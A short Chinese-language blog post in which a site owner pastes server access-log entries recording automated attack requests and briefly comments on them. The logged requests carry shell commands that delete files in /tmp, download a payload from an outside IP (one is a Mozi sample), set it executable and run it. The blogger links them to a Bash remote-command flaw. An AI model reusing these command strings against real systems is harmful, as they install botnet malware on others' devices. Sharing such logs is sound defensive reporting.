221.201.195.5 - - [21/Jan/2020:15:38:05 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226最近很多這種莫名其妙的攻擊
119.82.83.81 - - [21/Jan/2020:16:04:16 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
49.82.30.71 - - [21/Jan/2020:17:02:18 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 302 297 "-" "Hello, world"
88.247.131.12 - - [21/Jan/2020:17:06:52 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
180.156.40.119 - - [21/Jan/2020:18:18:37 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
93.42.75.233 - - [21/Jan/2020:18:24:50 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
105.184.139.121 - - [21/Jan/2020:19:10:27 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 226
估狗之後得知這是一種利用 Bash Shell 漏洞來進行遠端命令攻擊
wiki 中的 bashdoor 說明
從指令來看應該是專門針對 Linux 系統, 到指令中的 IP 去下載東西後再執行
查詢這 IP 91.92.66.124 是來自保加利亞
不曉得為什麼沒有被檢舉封鎖起來?
其中有一個蠻好笑的, 連線到 192.168.1.1 去下載? 還 Hello, world ? 是在哈囉?
沒有留言:
張貼留言